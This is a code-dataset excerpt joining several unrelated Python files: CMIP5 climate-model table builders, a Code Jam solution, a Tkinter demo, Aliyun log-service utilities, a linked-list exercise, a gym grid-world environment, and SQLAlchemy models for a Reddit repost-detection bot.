= get_Refs(m, 'OceanBiogeoChemistry')\r\n \r\n \r\n # 7. Get Ocean information\r\n \r\n #Check that realm is implemented\r\n m.oceanimplemented = is_compimpl(m, 'Ocean')\r\n if not m.oceanimplemented:\r\n m.oceanabbrev = 'Not Implemented' \r\n m.oceanrefs = 'Not Implemented'\r\n m.oceancits = 'Not Implemented'\r\n m.oceanhorgrid = 'Not Implemented'\r\n m.oceannumlevels = 'Not Implemented'\r\n m.oceanzcoord = 'Not Implemented'\r\n m.oceantoplevel = 'Not Implemented'\r\n m.oceantopbc = 'Not Implemented'\r\n else:\r\n #Get the abbrev\r\n m.oceanabbrev = get_compabbrev(m, 'Ocean')\r\n #Get the component references\r\n m.oceanrefs, m.oceancits = get_Refs(m, 'Ocean')\r\n #Get vert grid info\r\n m.oceantoplevel, m.oceannumlevels = get_vertgridinfo(m, 'Ocean')\r\n #Get the ocean grid z co-ordinate\r\n m.oceanzcoord = get_ZCoord(m, 'Ocean')\r\n #Get the ocean top BC\r\n m.oceantopbc = get_oceanTopBC(m)\r\n #Get horizontal grid menmonic and resolution\r\n oceangridres, oceangridmnem = get_HorGridRes(m, 'Ocean', \r\n mnemonic=True)\r\n m.oceanhorgrid = oceangridmnem+' '+ oceangridres\r\n \r\n \r\n # 8. Get Sea Ice column information\r\n \r\n #Check that realm is implemented\r\n m.seaiceimplemented = is_compimpl(m, 'SeaIce')\r\n if not m.seaiceimplemented:\r\n m.seaiceabbrev = m.seaicerefs = m.seaicecits = 'Not Implemented'\r\n else:\r\n #Get the abbrev\r\n m.seaiceabbrev = get_compabbrev(m, 'SeaIce')\r\n #Get the component references\r\n m.seaicerefs, m.seaicecits = get_Refs(m, 'SeaIce')\r\n \r\n return models\r\n\r\n\r\ndef ch09table(models):\r\n '''\r\n Generates all information necessary for AR5 ch09 table \r\n '''\r\n \r\n for m in models: \r\n \r\n # Get Model assembly information including any related constraints\r\n m.modelassembly, \\\r\n m.assemblyotherinstitutes,\\\r\n m.assemblyconsortium, \\\r\n m.mixedassemblynames, \\\r\n m.offshelfinst = get_modelassembly(m)\r\n \r\n #get any additional info supplied under the model development section\r\n m.modeldevothers = get_modeldevothers(m)\r\n \r\n \r\n # Get Model Tuning information\r\n m.meanstateglobmets = get_meanstateglobmets(m)\r\n m.obstrendsmets = get_obstrendsmets(m)\r\n m.meanstateregmets = get_meanstateregmets(m)\r\n m.tempvarmets = get_tempvarmets(m)\r\n m.adjparams = get_adjparams(m)\r\n m.othmodtuning = get_othmodtuning(m)\r\n \r\n #get any additional info supplied under the tuning section\r\n m.tuningsectothers = get_tuningsectothers(m)\r\n \r\n # Get Conservation of integral quantities information\r\n m.intconservation = get_intconservation(m)\r\n m.spectuning = get_spectuning(m)\r\n m.fluxcorrused = get_fluxcorrused(m)\r\n if m.fluxcorrused == 'Yes':\r\n m.fluxcorrfields = get_fluxcorrfields(m)\r\n m.fluxcorrmeth = get_fluxcorrmeth(m)\r\n else:\r\n m.fluxcorrfields = ['N/A']\r\n m.fluxcorrmeth = 'N/A'\r\n \r\n #get any additional info supplied under the conservation of integral \r\n # quantities section\r\n m.consintegothers = get_consintegothers(m)\r\n \r\n return models\r\n\r\n\r\ndef chemtable(models):\r\n '''\r\n Generates all information necessary for AR5 chemistry table \r\n '''\r\n \r\n for m in models: \r\n \r\n # Is land surface carbon cycle implemented?\r\n m.lsccimplemented = is_compimpl(m, 'LandSurfaceCarbonCycle')\r\n # Is ocean bio chemistry (carbon cycle) implemented?\r\n m.occimplemented = is_compimpl(m, 'OceanBiogeoChemistry')\r\n \r\n # How are aerosols represented, mass/volume, number etc?\r\n m.aermoments = get_aermoments(m)\r\n \r\n # What type of aerosol model scheme\r\n m.aerscheme = get_aerscheme(m)\r\n \r\n # What type of aerosol model scheme\r\n m.ocbiotracnuts = get_ocbiotracnuts(m)\r\n \r\n \r\n return models\r\n\r\n\r\ndef ar5table2(exps):\r\n '''\r\n Generates all information necessary for AR5 table 2 (i.e. the experiment \r\n description table) \r\n '''\r\n \r\n # Harvest all numerical requirements, omitting duplicates\r\n reqidlist = []\r\n reqlist = []\r\n \r\n for e in exps:\r\n for req in e.requirements.all():\r\n #first bind the req to the experiment for the template\r\n # Check for duplicate using docid\r\n if req.docid not in reqidlist:\r\n reqidlist.append(req.docid)\r\n reqlist.append(req)\r\n \r\n # Now assign true/false to individual experiment reqs if in global reqlist \r\n for e in exps:\r\n reqsinexp = []\r\n for reqid in reqidlist:\r\n if reqid in e.requirements.all().values_list('docid', flat=True):\r\n reqsinexp.append('True')\r\n else:\r\n reqsinexp.append('')\r\n \r\n e.reqsinexp = reqsinexp\r\n \r\n return reqlist, exps\r\n \r\n \r\ndef ar5table3(exps, model):\r\n '''\r\n Generates all information necessary for AR5 table 2 (i.e. the experiment \r\n description table) \r\n '''\r\n \r\n # Harvest all numerical requirements, omitting duplicates\r\n reqidlist = []\r\n reqlist = []\r\n \r\n for e in exps:\r\n for req in e.requirements.all():\r\n #first bind the req to the experiment for the template\r\n # Check for duplicate using docid\r\n if req.docid not in reqidlist:\r\n reqidlist.append(req.docid)\r\n reqlist.append(req)\r\n \r\n # Now assign true/false to individual experiment reqs if in global reqlist \r\n for e in exps:\r\n reqsinexp = []\r\n modconforms = []\r\n for reqid in reqidlist:\r\n if reqid in e.requirements.all().values_list('docid', flat=True):\r\n reqsinexp.append('True')\r\n #get the sim using the particular model for this experiment\r\n sim = Simulation.objects.filter(numericalModel=model, \r\n experiment=e)\r\n sim = sim.filter(isDeleted='False')\r\n # check current model conforms if it has been run for this exp\r\n if sim:\r\n #first get all reqs associated with the experiment\r\n ereqs = e.requirements.all()\r\n #get the actual requirement\r\n reqs = GenericNumericalRequirement.objects.filter(\r\n docid=reqid)\r\n #pull out the common requirement (must be better \r\n #way of doing this!)\r\n \r\n conf = Conformance.objects.filter(simulation=sim[0]).filter(\r\n requirement=req)\r\n modconforms.append('True')\r\n else:\r\n modconforms.append('') \r\n else:\r\n reqsinexp.append('')\r\n #mark conformance line as empty (ie doesn't come into play here)\r\n modconforms.append('')\r\n \r\n e.reqsinexp = reqsinexp\r\n e.modconforms = modconforms\r\n\r\n return reqlist, exps\r\n\r\n # Now assign conformant/not conformant/not applicable for each model\r\n # to individual experiment reqs\r\n for e in exps:\r\n #get the simulation using the particular model for this experiment\r\n sim = Simulation.objects.filter(numericalModel=model, experiment=e)\r\n sim = sim.filter(isDeleted='False')\r\n\r\n #get the confomances for this simulation\r\n confs = Conformance.objects.filter(simulation=sim[0])\r\n\r\n #iterate through and tag conformance existance/type\r\n modelconforms = []\r\n\r\n for reqid in reqidlist:\r\n if reqid in e.requirements.all().values_list('docid', flat=True):\r\n reqsinexp.append('True')\r\n else:\r\n reqsinexp.append('')\r\n\r\n e.reqsinexp = reqsinexp\r\n\r\n return reqlist, exps\r\n\r\n\r\ndef strattable(models):\r\n '''\r\n Generates all information necessary for strat model table\r\n '''\r\n\r\n for m in models:\r\n # Get the main model reference(s)\r\n m.mainrefs, m.maincits = get_Refs(m, 'model')\r\n\r\n # Atmosphere information\r\n m.atmosimplemented = is_compimpl(m, 'Atmosphere')\r\n if m.atmosimplemented:\r\n # Get the abbrev\r\n m.atmosabbrev = get_compabbrev(m, 'Atmosphere')\r\n # Get the component references\r\n m.atmosrefs, m.atmoscits = get_Refs(m, 'Atmosphere')\r\n # Get vert grid info\r\n m.atmosgridtop, m.atmosnumlevels = get_vertgridinfo(m,\r\n 'Atmosphere')\r\n # Get horizontal grid menmonic and resolution\r\n atmosgridres, atmosgridmnem = get_HorGridRes(m, 'Atmosphere',\r\n mnemonic=True)\r\n m.atmoshorgrid = atmosgridmnem + ' ' + atmosgridres\r\n # Get OR values\r\n m.oroggwsrcs, m.oroggwsrcurl = get_orvalues(m,\r\n sciencetype='AtmosOrographyAndWaves',\r\n pgname='OrographicGravityWaves',\r\n bpname='SourceMechanisms')\r\n m.oroggwprop, m.oroggwpropurl = get_xorvalue(m,\r\n sciencetype='AtmosOrographyAndWaves',\r\n pgname='OrographicGravityWaves',\r\n bpname='PropagationScheme')\r\n m.oroggwdiss, m.oroggwdissurl = get_xorvalue(m,\r\n sciencetype='AtmosOrographyAndWaves',\r\n pgname='OrographicGravityWaves',\r\n bpname='DissipationScheme')\r\n\r\n # Atmospheric chemistry column information\r\n m.atmchemimplemented = is_compimpl(m, 'AtmosphericChemistry')\r\n if m.atmchemimplemented:\r\n # Get the abbrev\r\n m.atmchemabbrev = get_compabbrev(m, 'AtmosphericChemistry')\r\n # Get the component references\r\n m.atmchemrefs, m.atmchemcits = get_Refs(m, 'AtmosphericChemistry')\r\n # Get OR values\r\n m.strathetchemgas, m.strathetchemgasurl = get_orvalues(m,\r\n sciencetype='StratosphericHeterChem',\r\n pgname='Species',\r\n bpname='GasPhase')\r\n m.strathetchemaer, m.strathetchemaerurl = get_orvalues(m,\r\n sciencetype='StratosphericHeterChem',\r\n pgname='Species',\r\n bpname='Aerosol')\r\n\r\n # Grid info\r\n if m.atmosimplemented:\r\n # Get vertical atmosphere grid info\r\n m.numlevels, \\\r\n m.topmodellevel, \\\r\n m.levsbelow850, \\\r\n m.levsabove200 = get_atmosvertgridinfo(m)\r\n\r\n return models\r\n","sub_path":"cmip5q/explorer/tableHandler.py","file_name":"tableHandler.py","file_ext":"py","file_size_in_byte":15456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"11823691","text":"#! /usr/bin/env python\n# -*- coding:utf-8 -*-\nimport sys\n\n#sys.setrecursionlimit(1100)\n#sys.maxint\n#-sys.maxint-1\n\ndef calc_damage(P):\n damage = 0\n strength = 1\n for op in P:\n if op == 'S':\n damage += strength\n elif op == 'C':\n strength *= 2\n return damage\n\ndef count_(P):\n tbl = {}\n count_c = 0\n for op in P:\n if op == 'S':\n if count_c not in tbl:\n tbl[count_c] = 0\n tbl[count_c] += 1\n elif op == 'C':\n count_c += 1\n return tbl\n\ndef solve(D, P):\n damage = calc_damage(P)\n tbl = count_(P)\n count = 0\n while damage > D:\n r = sorted(tbl.items(), reverse=True)\n if len(r) == 0 or r[0][0] == 0:\n break\n\n damage -= pow(2, r[0][0]-1)\n tbl[r[0][0]] -= 1\n if tbl[r[0][0]] == 0:\n tbl.pop(r[0][0])\n\n if r[0][0]-1 not in tbl:\n tbl[r[0][0]-1] = 0\n tbl[r[0][0]-1] += 1\n count += 1\n\n return count if damage <= D else 'IMPOSSIBLE'\n\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n f = open(sys.argv[1])\n else:\n f = sys.stdin\n\n num_of_case = int(f.readline())\n for i in range(num_of_case):\n elms = f.readline().rstrip().split()\n answer = solve(int(elms[0]), list(elms[1]))\n print(\"Case #{}: {}\".format(i+1, answer), file=sys.stdout)\n\n# sort by key\n# for k,v in sorted(d.items())\n# sort by value\n# for k,v in sorted(d.items(), key=lambda x:x[1], reverse=True)\n# items() return tapple, tapple[0] is k, tapple[1] is v\n#\n# import copy\n# copy.copy()\n# copy.deepcopy()\n#\n# a = [0]*100\n#\n# for tc in xrange(1, int(sys.stdin.readline())+1):\n# A, B = [int(w) for w in sys.stdin.readline().split()]\n# p = [float(w) for w in sys.stdin.readline().split()]\n#\n# array = [[0 for j in range(m)] for i in range(n)]\n\n","sub_path":"2018_q/SavingUniverseAgain.py","file_name":"SavingUniverseAgain.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"552502002","text":"import tkinter as tk\nimport random\n\nroot = tk.Tk()\nroot.geometry('170x200+30+30')\n\nlanguages = ['Python', 'Perl', 'C++', 'Java', 'Tcl/Tk']\nlabels = range(5)\nfor i in range(5):\n ct = [random.randrange(256) for x in range(3)]\n brightness = int(round(0.299 * ct[0] + 0.587 * ct[1] + 0.114 * ct[2]))\n print(ct)\n ctHex = '{:02x}{:02x}{:02x}'.format(*tuple(ct))\n print(ctHex)\n bgColor = '#' + ''.join(ctHex)\n l = tk.Label(\n root, text=languages[i], fg='White' if brightness < 120 else 'Black', bg=bgColor)\n l.place(x=20, y=30 + i * 30, width=120, height=25)\n\nroot.mainloop()\n","sub_path":"Tutorial/GUI/Tkinter/pythonCourseTutorial/layout_place.py","file_name":"layout_place.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"556678579","text":"from .logexception import LogException\nimport six\nimport json\nfrom aliyun.log import *\nfrom concurrent.futures import ProcessPoolExecutor, as_completed\nimport multiprocessing\nfrom .logresponse import LogResponse\n\nMAX_INIT_SHARD_COUNT = 10\n\n\ndef copy_project(from_client, to_client, from_project, to_project, copy_machine_group=False):\n \"\"\"\n copy project, logstore, machine group and logtail config to target project,\n expecting the target project doens't exist\n :type from_client: LogClient\n :param from_client: logclient instance\n\n :type to_client: LogClient\n :param to_client: logclient instance\n\n :type from_project: string\n :param from_project: project name\n\n :type to_project: string\n :param to_project: project name\n\n :type copy_machine_group: bool\n :param copy_machine_group: if copy machine group resources, False by default.\n\n\n :return:\n \"\"\"\n\n # copy project\n ret = from_client.get_project(from_project)\n try:\n ret = to_client.create_project(to_project, ret.get_description())\n except LogException as ex:\n if ex.get_error_code() == 'ProjectAlreadyExist':\n # don't create the project as it already exists\n pass\n\n default_fetch_size = 100\n\n # list logstore and copy them\n offset, size = 0, default_fetch_size\n while True:\n ret = from_client.list_logstore(from_project, offset=offset, size=size)\n count = ret.get_logstores_count()\n total = ret.get_logstores_total()\n for logstore_name in ret.get_logstores():\n # copy logstore\n ret = from_client.get_logstore(from_project, logstore_name)\n ret = to_client.create_logstore(to_project, logstore_name, ret.get_ttl(),\n min(ret.get_shard_count(), MAX_INIT_SHARD_COUNT))\n\n # copy index\n try:\n ret = from_client.get_index_config(from_project, logstore_name)\n ret = to_client.create_index(to_project, logstore_name, ret.get_index_config())\n except LogException as ex:\n if ex.get_error_code() == 'IndexConfigNotExist':\n pass\n\n offset += count\n if count < size or offset >= total:\n break\n\n # list logtail config and copy them\n offset, size = 0, default_fetch_size\n while True:\n ret = from_client.list_logtail_config(from_project, offset=offset, size=size)\n count = ret.get_configs_count()\n total = ret.get_configs_total()\n\n for config_name in ret.get_configs():\n ret = from_client.get_logtail_config(from_project, config_name)\n ret = to_client.create_logtail_config(to_project, ret.logtail_config)\n\n offset += count\n if count < size or offset >= total:\n break\n\n # list machine group and copy them\n offset, size = 0, default_fetch_size\n while copy_machine_group:\n ret = from_client.list_machine_group(from_project, offset=offset, size=size)\n count = ret.get_machine_group_count()\n total = ret.get_machine_group_total()\n\n for group_name in ret.get_machine_group():\n ret = from_client.get_machine_group(from_project, group_name)\n ret = to_client.create_machine_group(to_project, ret.get_machine_group())\n\n # list all applied config and copy the relationship\n ret = from_client.get_machine_group_applied_configs(from_project, group_name)\n for config_name in ret.get_configs():\n to_client.apply_config_to_machine_group(to_project, config_name, group_name)\n\n offset += count\n if count < size or offset >= total:\n break\n\n\ndef list_more(fn, offset, size, batch_size, *args):\n \"\"\"list all data using the fn\n \"\"\"\n if size < 0:\n expected_total_size = six.MAXSIZE\n else:\n expected_total_size = size\n batch_size = min(size, batch_size)\n\n response = None\n total_count_got = 0\n while True:\n ret = fn(*args, offset=offset, size=batch_size)\n if response is None:\n response = ret\n else:\n response.merge(ret)\n\n count = ret.get_count()\n total = ret.get_total()\n offset += count\n total_count_got += count\n batch_size = min(batch_size, expected_total_size - total_count_got)\n\n if count == 0 or offset >= total or total_count_got >= expected_total_size:\n break\n\n return response\n\n\ndef query_more(fn, offset, size, batch_size, *args):\n \"\"\"list all data using the fn\n \"\"\"\n if size < 0:\n expected_total_size = six.MAXSIZE\n else:\n expected_total_size = size\n batch_size = min(size, batch_size)\n\n response = None\n total_count_got = 0\n complete = False\n while True:\n ret = fn(*args, offset=offset, size=batch_size)\n\n if response is None:\n response = ret\n else:\n response.merge(ret)\n\n # if incompete, exit\n if not ret.is_completed():\n break\n\n count = ret.get_count()\n offset += count\n total_count_got += count\n batch_size = min(batch_size, expected_total_size - total_count_got)\n if count == 0 or total_count_got >= expected_total_size:\n break\n\n return response\n\n\ndef list_logstore_all(client, project):\n \"\"\"\n list all project\n :type client: LogClient\n :param client: logclient instance\n\n :return:\n \"\"\"\n\n default_fetch_size = 100\n\n # list logstore and copy them\n offset, size = 0, default_fetch_size\n response = None\n while True:\n ret = client.list_logstores(project, offset=offset, size=size)\n if response is None:\n response = ret\n else:\n response.merge(ret)\n\n count = ret.get_count()\n total = ret.get_total()\n offset += count\n if count < size or offset >= total:\n break\n\n\ndef list_logtail_config_all(client, project):\n \"\"\"\n list all project\n :type client: LogClient\n :param client: logclient instance\n\n :return:\n \"\"\"\n\n default_fetch_size = 100\n\n # list logstore and copy them\n offset, size = 0, default_fetch_size\n response = None\n while True:\n ret = client.list_logtail_config(project, offset=offset, size=size)\n if response is None:\n response = ret\n else:\n response.merge(ret)\n\n count = ret.get_count()\n total = ret.get_total()\n offset += count\n if count < size or offset >= total:\n break\n\n\ndef worker(client, project_name, logstore_name, from_time, to_time,\n shard_id, file_path,\n batch_size=1000, compress=True):\n res = client.pull_log(project_name, logstore_name, shard_id, from_time, to_time, batch_size=batch_size,\n compress=compress)\n\n count = 0\n for data in res:\n for log in data.get_flatten_logs_json():\n with open(file_path, \"a+\") as f:\n count += 1\n f.write(json.dumps(log))\n f.write(\"\\n\")\n\n return file_path, count\n\n\ndef pull_log_dump(client, project_name, logstore_name, from_time, to_time, file_path, batch_size=500, compress=True):\n cpu_count = multiprocessing.cpu_count() * 2\n shards = client.list_shards(project_name, logstore_name).get_shards_info()\n worker_size = min(cpu_count, len(shards))\n\n result = dict()\n total_count = 0\n with ProcessPoolExecutor(max_workers=worker_size) as pool:\n futures = [pool.submit(worker, client, project_name, logstore_name, from_time, to_time,\n shard_id=shard['shardID'], file_path=file_path.format(shard['shardID']),\n batch_size=batch_size, compress=compress)\n for shard in shards]\n\n for future in as_completed(futures):\n file_path, count = future.result()\n total_count += count\n if count:\n result[file_path] = count\n\n return LogResponse({}, {\"total_count\": total_count, \"files\": result})\n","sub_path":"aliyun/log/logclient_operator.py","file_name":"logclient_operator.py","file_ext":"py","file_size_in_byte":8118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"641713580","text":"# Definition for singly-linked list.\nclass ListNode(object):\n\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution(object):\n\n def partition(self, head, x):\n \"\"\"\n :type head: ListNode\n :type x: int\n :rtype: ListNode\n \"\"\"\n p1, p2 = ListNode(0), ListNode(0)\n hp1, hp2 = p1, p2\n while head:\n if head.val < x:\n p1.next = head\n p1 = p1.next\n else:\n p2.next = head\n p2 = p2.next\n head = head.next\n p2.next = None\n p1.next = hp2.next\n return hp1.next\n\n\ndef arrToList(arr):\n temp = None\n for x in reversed(arr):\n head = ListNode(x)\n head.next = temp\n temp = head\n return head\n\n\ndef print_list(node):\n while node:\n print(node.val, end=\" \")\n node = node.next\n print()\n\n\ngiven = arrToList([1, 4, 3, 2, 5, 2])\ntest = Solution()\nresult = test.partition(given, 3)\nprint_list(result)\n","sub_path":"python/86 Partition List.py","file_name":"86 Partition List.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"323453833","text":"import gym\nfrom Viewer import Viewer\nfrom gym import spaces\nfrom gym.utils import seeding\n\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nclass GridWorldEnv(gym.Env):\n metadata = {\n 'render.modes': ['human']\n }\n\n def __init__(self):\n self.width = 16\n self.height = 9\n self._cell_size = 10\n\n self.action_space = spaces.Discrete(4)\n self.observation_space = spaces.Box(self.height * self._cell_size, self.width * self._cell_size, 1)\n\n self.viewer = Viewer(width=self.width, height=self.height, cell_size=self._cell_size)\n\n self._seed()\n self.reset()\n\n def _seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def _step(self, action):\n assert self.action_space.contains(action), \"%r (%s) invalid\" % (action, type(action))\n self.viewer.move_agent(action)\n self.state = self.viewer.get_state()\n done = self.viewer.is_on_goal()\n reward = 1 if done else 0\n return self.state, reward, done, {}\n\n def _reset(self):\n self.viewer.reset_agent()\n self.state = self.viewer.get_state()\n return self.state\n\n def _render(self, mode='human', close=False):\n if close:\n if self.viewer is not None:\n self.viewer.close()\n self.viewer = None\n return\n return self.viewer.render()\n\n def set_grid_size(self, width, height):\n self.width = width\n self.height = height\n self.viewer = Viewer(height=self.height, width=self.width, cell_size=self._cell_size)\n self.reset()\n","sub_path":"ifqi/algorithms/selection/feature_selection/grid_world/grid_world/envs/gridworld_env.py","file_name":"gridworld_env.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"342590335","text":"from sqlalchemy import Column, Integer, String, DateTime, func, Boolean, Text, ForeignKey, Float, Index\nfrom sqlalchemy.dialects.postgresql import UUID\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship\n\nBase = declarative_base()\n\n\nclass Post(Base):\n\n def __lt__(self, other):\n return self.image_hash < other.image_hash\n\n def __repr__(self) -> str:\n return 'Post ID: {} - Type: {} - URL: {} - Source: {} - Created: {}'.format(self.post_id, self.post_type, self.url, self.ingested_from, self.created_at)\n\n # TODO - Move to_dict methods into JSON encoders\n\n __tablename__ = 'reddit_post'\n __table_args__ = (\n Index('ingest_source', 'created_at', 'ingested_from'),\n Index('ingest_graph', 'ingested_at', 'post_type', unique=False),\n Index('image_repost_check', 'post_type', 'checked_repost', 'crosspost_parent', 'dhash_h', unique=False),\n Index('image_hash', 'post_type', 'dhash_h', unique=False),\n )\n\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False, unique=True)\n url = Column(String(2000, collation='utf8mb4_general_ci'), nullable=False)\n shortlink = Column(String(300))\n perma_link = Column(String(1000, collation='utf8mb4_general_ci'))\n post_type = Column(String(20))\n author = Column(String(100), nullable=False)\n selftext = Column(Text(75000, collation='utf8mb4_general_ci'))\n created_at = Column(DateTime)\n ingested_at = Column(DateTime, default=func.utc_timestamp())\n subreddit = Column(String(100), nullable=False)\n title = Column(String(1000, collation='utf8mb4_general_ci'), nullable=False)\n crosspost_parent = Column(String(200))\n dhash_v = Column(String(64))\n dhash_h = Column(String(64))\n ahash = Column(String(64))\n checked_repost = Column(Boolean, default=False)\n crosspost_checked = Column(Boolean, default=False)\n last_deleted_check = Column(DateTime, default=func.utc_timestamp())\n url_hash = Column(String(32)) # Needed to index URLs for faster lookups\n ingested_from = Column(String(40))\n left_comment = Column(Boolean, default=False)\n\n bad_url = Column(Boolean, default=False)\n repost_count = Column(Integer, default=0)\n #fullname = Column(String(30))\n\n def to_dict(self):\n return {\n 'post_id': self.post_id,\n 'url': self.url,\n 'shortlink': self.shortlink,\n 'perma_link': self.perma_link,\n 'title': self.title,\n 'dhash_v': self.dhash_v,\n 'dhash_h': self.dhash_h,\n 'created_at': self.created_at.timestamp(),\n 'author': self.author,\n 'subreddit': self.subreddit\n }\n\nclass RedditImagePost(Base):\n __tablename__ = 'reddit_image_post'\n __table_args__ = (\n Index('create_at_index', 'created_at', unique=False),\n )\n\n id = Column(Integer, primary_key=True)\n created_at = Column(DateTime)\n post_id = Column(String(100), nullable=False, unique=True)\n dhash_v = Column(String(64))\n dhash_h = Column(String(64))\n\nclass RedditImagePostCurrent(Base):\n __tablename__ = 'reddit_image_post_current'\n # Dirty but we need to maintain a seperate table to build indexes from\n id = Column(Integer, primary_key=True)\n created_at = Column(DateTime)\n post_id = Column(String(100), nullable=False, unique=True)\n dhash_v = Column(String(64))\n dhash_h = Column(String(64))\n\n\nclass Summons(Base):\n __tablename__ = 'reddit_bot_summons'\n __table_args__ = (\n Index('user_summons_check', 'requestor', 'summons_received_at', unique=False),\n )\n\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False)\n requestor = Column(String(100))\n comment_id = Column(String(100), unique=True)\n comment_body = Column(String(1000, collation='utf8mb4_general_ci'))\n comment_reply = Column(String(5000))\n comment_reply_id = Column(String(100))\n summons_received_at = Column(DateTime)\n summons_replied_at = Column(DateTime)\n subreddit = Column(String(100), nullable=False)\n\nclass BotComment(Base):\n __tablename__ = 'reddit_bot_comment'\n\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False)\n comment_body = Column(String(2000, collation='utf8mb4_general_ci'))\n perma_link = Column(String(1000, collation='utf8mb4_general_ci'))\n comment_left_at = Column(DateTime, default=func.utc_timestamp())\n source = Column(String(20), nullable=False)\n comment_id = Column(String(20), nullable=False)\n subreddit = Column(String(100), nullable=False)\n karma = Column(Integer)\n active = Column(Boolean, default=True)\n needs_review = Column(Boolean, default=False)\n\nclass BotPrivateMessage(Base):\n __tablename__ = 'reddit_bot_private_message'\n\n id = Column(Integer, primary_key=True)\n subject = Column(String(200), nullable=False)\n body = Column(String(1000), nullable=False)\n in_response_to_comment = Column(String(20))\n in_response_to_post = Column(String(100))\n recipient = Column(String(150), nullable=False)\n triggered_from = Column(String(50), nullable=False)\n message_sent_at = Column(DateTime, default=func.utc_timestamp())\n\n\nclass Comment(Base):\n __tablename__ = 'reddit_comments'\n\n id = Column(Integer, primary_key=True)\n comment_id = Column(String(100), nullable=False, unique=True)\n body = Column(Text(collation='utf8mb4_general_ci'))\n ingested_at = Column(DateTime, default=func.utc_timestamp())\n\nclass RepostWatch(Base):\n __tablename__ = 'reddit_repost_watch'\n\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False)\n user = Column(String(100), nullable=False)\n created_at = Column(DateTime, default=func.utc_timestamp())\n last_detection = Column(DateTime)\n same_sub = Column(Boolean, default=False, nullable=False)\n expire_after = Column(Integer)\n enabled = Column(Boolean, default=True)\n source = Column(String(100))\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'enabled': self.enabled,\n 'post_id': self.post_id,\n 'user': self.user,\n 'created_at': self.created_at.timestamp(),\n 'last_detection': self.last_detection.timestamp() if self.last_detection else None,\n 'expire_after': self.expire_after,\n 'source': self.source\n }\n\nclass ImageRepost(Base):\n\n __tablename__ = 'image_reposts'\n __table_args__ = (\n Index('Index 3', 'repost_of', unique=False),\n Index('idx_author', 'author', unique=False),\n Index('idx_detected_at', 'detected_at', unique=False),\n Index('idx_repost_of_date', 'detected_at', 'author', unique=False)\n )\n id = Column(Integer, primary_key=True)\n hamming_distance = Column(Integer)\n annoy_distance = Column(Float)\n post_id = Column(String(100), nullable=False)\n repost_of = Column(String(100), nullable=False)\n detected_at = Column(DateTime, default=func.utc_timestamp())\n author = Column(String(100))\n subreddit = Column(String(100), nullable=False)\n source = Column(String(100))\n search_id = Column(Integer)\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'hamming_distance': self.hamming_distance,\n 'post_id': self.post_id,\n 'repost_of': self.repost_of,\n 'detected_at': self.detected_at.timestamp() if self.detected_at else None,\n 'author': self.author,\n 'subreddit': self.subreddit,\n 'source': self.source,\n 'search_id': self.search_id\n }\n\nclass LinkRepost(Base):\n\n __tablename__ = 'link_reposts'\n __table_args__ = (\n Index('Index 3', 'repost_of', unique=False),\n Index('idx_author', 'author', unique=False),\n Index('idx_detected_at', 'detected_at', unique=False),\n Index('idx_repost_of_date', 'detected_at', 'author', unique=False)\n )\n\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False, unique=True)\n repost_of = Column(String(100), nullable=False)\n detected_at = Column(DateTime, default=func.utc_timestamp())\n author = Column(String(100))\n subreddit = Column(String(100), nullable=False)\n source = Column(String(100))\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'post_id': self.post_id,\n 'repost_of': self.repost_of,\n 'detected_at': self.detected_at.timestamp() if self.detected_at else None,\n 'author': self.author,\n 'subreddit': self.subreddit,\n 'source': self.source,\n }\n\nclass VideoHash(Base):\n __tablename__ = 'reddit_video_hashes'\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False, unique=True)\n created_at = Column(DateTime, default=func.utc_timestamp())\n hashes = Column(String(1300))\n length = Column(Integer)\n\nclass AudioFingerPrint(Base):\n __tablename__ = 'audio_fingerprints'\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False)\n hash = Column(String(30), nullable=False)\n offset = Column(Integer, nullable=False)\n created_at = Column(DateTime, default=func.utc_timestamp())\n\nclass IndexBuildTimes(Base):\n __tablename__ = 'index_build_times'\n id = Column(Integer, primary_key=True)\n index_type = Column(String(50), nullable=False)\n hostname = Column(String(200), nullable=False)\n items = Column(Integer, nullable=False)\n build_start = Column(DateTime, nullable=False)\n build_end = Column(DateTime, nullable=False)\n build_minutes = Column(Integer)\n\nclass MonitoredSub(Base):\n __tablename__ = 'reddit_monitored_sub'\n\n id = Column(Integer, primary_key=True)\n name = Column(String(200), nullable=False, unique=True)\n active = Column(Boolean, default=False)\n repost_only = Column(Boolean, default=True)\n report_submission = Column(Boolean, default=False)\n report_msg = Column(String(200), default='RepostSleuthBot-Repost')\n requestor = Column(String(150))\n added_at = Column(DateTime, default=func.utc_timestamp())\n target_hamming = Column(Integer)\n target_annoy = Column(Float)\n target_days_old = Column(Integer)\n same_sub_only = Column(Boolean, default=False)\n notes = Column(String(500))\n filter_crossposts = Column(Boolean, default=True)\n filter_same_author = Column(Boolean, default=True)\n sticky_comment = Column(Boolean, default=False)\n remove_repost = Column(Boolean, default=False)\n removal_reason = Column(String(200))\n lock_post = Column(Boolean, default=False)\n mark_as_oc = Column(Boolean, default=False)\n 